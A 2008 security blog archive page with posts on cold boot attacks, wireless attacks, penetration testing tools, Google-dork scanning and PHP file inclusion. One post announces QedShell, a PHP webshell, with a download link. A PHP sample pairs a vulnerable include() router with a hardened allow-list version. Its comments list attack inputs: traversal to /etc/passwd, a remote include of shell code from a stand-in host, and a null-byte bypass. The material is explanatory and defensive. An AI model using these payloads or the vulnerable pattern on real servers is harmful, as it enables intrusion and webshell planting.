Monthly Archives: February 2008

Cold Boot Attacks on Encryption Keys: What's the risk?

Filed under Cryptography

I am sure everyone has heard about, and watched, the YouTube video in which the Princeton researchers demonstrate cold boot attacks against disk encryption. If you haven't, I highly suggest you do. The core of the problem is that DRAM keeps its contents for seconds to minutes after power is removed (longer if the chips are cooled), so an attacker with physical access to a running or sleeping machine can reboot it, dump memory, and pull the disk encryption key out of the image. As everyone agrees, this is a very significant vulnerability, and every organization that relies on software disk encryption should look at ways to mitigate this new risk.

There are a ton of articles already about this new threat, so I won't bore you with the details; however, I have found one posted by Rich over at Securosis.com that sums up the entire issue and what it might mean for your organization.

One thing I would like to highlight from his article: contact the vendor of the disk encryption product you use and ask whether they plan to address this new vulnerability. In the meantime, remember that the key only has to be in RAM while the encrypted volume is mounted, so fully powering off a laptop before leaving it unattended (rather than suspending it, which keeps RAM powered and the key resident) shrinks the window of exposure to the short decay time after power-off. It is only a matter of time before the first tool is in the wild and being used against stolen laptops.

802.11 Attacks Whitepaper

Filed under Wireless Security


Foundstone always puts together great research and releases great tools.

The other day Foundstone released a whitepaper describing both new and old 802.11 (wireless) attacks. The paper gives some really good information about AP impersonation, rogue access points, and implementation attacks (WEP, dynamic WEP, and WPA/WPA2 cracking, including the Caffe Latte attack, which recovers a WEP key from an isolated client without the real AP in range). The paper even goes into attacks against wireless client adapters and wireless DoS attacks.

If you conduct wireless penetration tests or want to know more about wireless security, I highly recommend you read this paper. You can download the 802.11 Attacks whitepaper directly from Foundstone.

Automated Penetration Testing with CORE IMPACT

Filed under Penetration Testing


Last week I spoke at a local security professionals user group about Automated Penetration Testing with CORE IMPACT (from Core Security Technologies). There have been some great developments in the automated penetration testing area recently with commercial tools like CORE IMPACT and Immunity's CANVAS. However, let's not forget about recent advancements in open source solutions like Metasploit 3. All of these products automate the exploitation phase of a penetration test.

Instead of posting my slide deck I will highlight some of the key points below. Note that this is presented from the perspective of a customer; it was not a sales pitch for CORE IMPACT, even though they do have a great product. Next month I will be speaking about Metasploit 3, specifically the autopwn feature, which automates exploiting network hosts. One thing I want to mention: automated penetration testing should never replace detailed manual penetration testing! Use these tools to supplement your toolkit, not to replace manual work!

Goolag Scanner – Google Vulnerability Scanner Released

Filed under Hacking


The infamous Cult of the Dead Cow (cDc) has released a very cool Google vulnerability scanner called Goolag Scanner. Rather than probing the target directly, the tool runs a library of Google search queries scoped to a specific web site or domain to find known vulnerabilities and misconfigurations that Google has already indexed.

From an eWeek article:

“The open-source program comes with about 1,500 custom Google search queries embedded by default to run searches for vulnerable Web applications, misconfigured Web servers with open backdoors, sensitive user names and passwords, and other documents accidentally exposed on the Internet.”

From the cDc press release:

“It’s no big secret that the Web is the platform,” said cDc spokesmodel Oxblood Ruffin. “And this platform pretty much sucks from a security perspective. Goolag Scanner provides one more tool for web site owners to patch up their online properties. We’ve seen some pretty scary holes through random tests with the scanner in North America, Europe, and the Middle East. If I were a government, a large corporation, or anyone with a large web site, I’d be downloading this beast and aiming it at my site yesterday. The vulnerabilities are that serious.”

Looks like they took Johnny Long's "Google Dorks" search queries and put them into an automated tool. Very nice. Right now the tool only runs on Windows (.NET), but it looks like they will soon release it for other platforms. It is nice to see all of these search queries put into an easy-to-use interface. Goolag Scanner and Maltego make fantastic additions to your pentest reconnaissance toolkit. You can download Goolag Scanner here.

Notacon 5: April 4-6 Cleveland, Ohio

Filed under Hacking

If you are in the Cleveland, Ohio area you should check out the local con called Notacon. It is similar to Defcon or ShmooCon but much smaller and, in my opinion, more distinctive. From the Notacon web site:

“NOTACON, an annual conference held in Cleveland, Ohio, explores and showcases technologies, philosophy and creativity often overlooked at other “hacker cons”. Our desire is not to supplant other events, but complement them and strike a balance that has gone unnoticed in our community for far too long.

With each new year we build upon the successes and knowledge of the previous years. Our goal is to enlighten, educate, and entertain attendees, presenters, and staff alike. We try to do this by finding new ways to apply technology to graphics, art, music, or social interaction.

Notacon espouses an ethos of exploration, participation and positive contributions. Hence, while some of the material we may cover is controversial or potentially “black hat” in nature, we feel it is important to bring light to all topics so that everyone can learn from the experience and create something good, fun or interesting from it.

Events during Notacon run from Friday morning through Sunday afternoon. These include over 40 presentations, contests such as “Anything but Ethernet”, game shows, prize giveaways and a whole lot of who-knows-what. Anything can happen, and usually does.”

It’s also affordable! $50 gets you into the con for the whole weekend. Looks like they have some interesting talks planned including “Bagcam – How did TSA and/or the airlines manage to do that to your luggage?” and the “Exploit-Me Series: Firefox Plug-ins for Application Penetration Testing”.

PHP File Include Attacks Explained

Filed under Hacking

If you have been checking out Quzart's QedShell v2.0 article and want to know more about PHP file include attacks and how they work, be sure to check out the fantastic four-part series about these attacks on TippingPoint's DV Labs blog. The short version: whenever user-controlled input reaches include() or require(), an attacker can pull in arbitrary local files, or remote URLs if allow_url_include (or allow_url_fopen on older PHP) is enabled, and PHP will execute whatever it finds there, which is exactly how a webshell like QedShell ends up running on a server. I have yet to find a more comprehensive article on this subject.
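As an added example that is not from the DV Labs series, QedShell, or this blog, here is the classic vulnerable PHP page router next to a hardened replacement. The pages/ directory, the page names home and about, and the request values in the demo are all hypothetical; the behaviour of include(), allow_url_include and realpath() is standard PHP.

```php
<?php
// Added example (not from the DV Labs series or this blog).
// Assumes a layout like ./pages/home.php and ./pages/about.php (hypothetical).

// --- Vulnerable: the attacker controls the include path -------------------
// ?page=../../../../etc/passwd          -> local file inclusion / file read
// ?page=http://evil.example/shell.txt   -> remote file inclusion: the fetched
//     text is executed as PHP when allow_url_include (PHP >= 5.2) or, on older
//     releases, allow_url_fopen is enabled. This is how a webshell gets planted.
// ?page=../../uploads/avatar.jpg%00     -> on PHP < 5.3.4 the null byte truncates
//     the path, so the ".php" suffix below does not help.
function render_page_vulnerable(string $page): void
{
    include 'pages/' . $page . '.php';
}

// --- Hardened: an allow-list of known pages; paths are never built from input
const PAGES = [
    'home'  => 'pages/home.php',
    'about' => 'pages/about.php',
];

function resolve_page(string $requested): ?string
{
    // Exact-match lookup. "../x", URLs, "%00" and anything else are rejected.
    return PAGES[$requested] ?? null;
}

function render_page_safe(string $requested): void
{
    $file = resolve_page($requested);
    if ($file === null) {
        http_response_code(404);
        return;
    }
    include $file;
}

// --- Defence in depth when the set of pages cannot be listed statically ------
// Restrict the name to a safe charset, then make sure the resolved path still
// lies inside $baseDir after realpath() has collapsed ".." and symlinks.
function resolve_page_in_dir(string $requested, string $baseDir): ?string
{
    if (!preg_match('/^[a-z0-9_-]{1,32}$/', $requested)) {
        return null;
    }
    $base = realpath($baseDir);
    $path = realpath($baseDir . '/' . $requested . '.php');
    if ($base === false || $path === false) {
        return null; // directory missing or page does not exist
    }
    if (strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null; // escaped the base directory
    }
    return $path;
}

// CLI demo over constructed inputs (not real requests).
$samples = [
    'home',
    'about',
    '../../../../etc/passwd',
    'http://evil.example/shell.txt',
    "home\0",
];
foreach ($samples as $s) {
    printf("%-32s -> %s\n", addcslashes($s, "\0"), resolve_page($s) ?? 'rejected');
}
```

Only the first two inputs resolve; the traversal, URL and null-byte variants are all rejected because the lookup is an exact match rather than string concatenation. Independently of the code, set allow_url_include = Off (and allow_url_fopen = Off if nothing needs it) in php.ini so that a future include bug cannot be turned into remote code execution.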

Social Networks and Personal Information

Filed under Security Awareness


Good post over at GNUCITIZEN today. They talk about how easy it would be for an attacker to social engineer their way into LinkedIn connections in order to gather information about a potential business target, possibly even your own company.

Social networking in general is very popular with security-minded and non-security-minded people alike. I use LinkedIn, as do many other security professionals, because of the obvious career benefits. Even a gray hat or black hat hacker can use LinkedIn to further a legitimate career in the corporate world, for example by earning a LinkedIn connection through a project for Hackers for Charity. It all comes down to the "personal risk" you associate with using a site like LinkedIn; the benefit may outweigh the risk in your case. Here are a few things you can do to help minimize your personal information exposure:

1. Do not make your LinkedIn profile public
2. Only accept connections from people you know and/or have personally worked with.

For example, if you own your own business you may want a public profile available to generate business. Again, this all depends on your personal risk assessment of your personal information.

QedShell v2.0

Filed under Penetration Testing

c99shell from the ccteam was a great PHP script; unfortunately, support has been discontinued. The idea is to have an all-in-one file to administer a server once that file is uploaded.
When you look into the source of c99shell it is a bit chaotic, and it is even detected by some anti-virus programs. For these reasons I wrote the code of QedShell from scratch.
This project is also aimed at helping people learn PHP; for that reason I have commented almost every line.

Download it here:
http://fronted.quzart.nl/component/option,com_remository/func,fileinfo/id,11/


Wireless Headset Dangers

Filed under Wireless Security


I was listening to the latest Security Now podcast, and Steve Gibson mentioned an interesting social engineering attack in which some penetration testers were able to pose as employees simply by listening to conference calls and other telephone conversations from across the street from the company's facility. They used a police scanner tuned to the 800-900 MHz range to pick up the unencrypted signals of wireless headsets (very popular with many companies). There was also a very good article on this attack posted on Dark Reading that is a must-read.

New blogger

Filed under Spylogic News

Welcome Quzart to the spylogic.net team!

Another blogger from the Netherlands, Quzart, will be posting an article on his reworking of the c99shell PHP script. Keep an eye out for it. Thanks Quzart!